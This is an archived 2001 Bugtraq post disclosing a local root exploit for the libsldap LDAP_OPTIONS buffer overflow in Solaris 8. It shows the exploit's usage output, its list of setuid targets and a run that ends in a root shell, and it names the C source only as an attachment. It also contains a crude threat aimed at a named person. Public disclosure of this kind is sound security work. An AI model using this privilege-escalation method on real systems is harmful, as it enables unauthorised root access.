Bugtraq mailing list archives
Solaris 8 libsldap exploit
From: Noir Desir <noir () gsu linux org tr>
Date: Thu, 5 Jul 2001 14:14:09 +0300 (EEST)
Hi,

I wish to free this one since it has been made public by some ppl. libsldap hole has been known for long. As far as I know, sway () hack co za did actually find the hole several months ago and generously let me know about it. All propz goes to him. Thanks bro.

Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with success.

I usually support the anti-sec movement but I got my reasons to publish the exploit. If you want to know why, please do mail me.

$ ./libsldap-exp
libsldap.so.1 $LDAP_OPTIONS enviroment variable buffer overflow
Exploit code: noir () gsu linux org tr
Bug discovery: sway () hack co za
Usage: ./libsldap-exp target#
target#: 0, /usr/bin/passwd Solaris8, Sparc64
target#: 1, /usr/bin/nispasswd Solaris8, Sparc64
target#: 2, /usr/bin/yppasswd Solaris8, Sparc64
target#: 3, /usr/bin/chkey Solaris8, Sparc64
target#: 4, /usr/lib/sendmail Solaris8, Sparc64
$ ./libsldap-exp 0
# id
uid=0(root) gid=0(root)
#

PS: t(L)amer sahin, you are going to get such a kick in the ass that it will come out of your mouth. Just wanted to let you know : )

Greetings: sway, anathema, gov-boi, www.hack.co.za, ertan_kurt, cronos

cheers,
noir
Attachment: libsldap-exp.c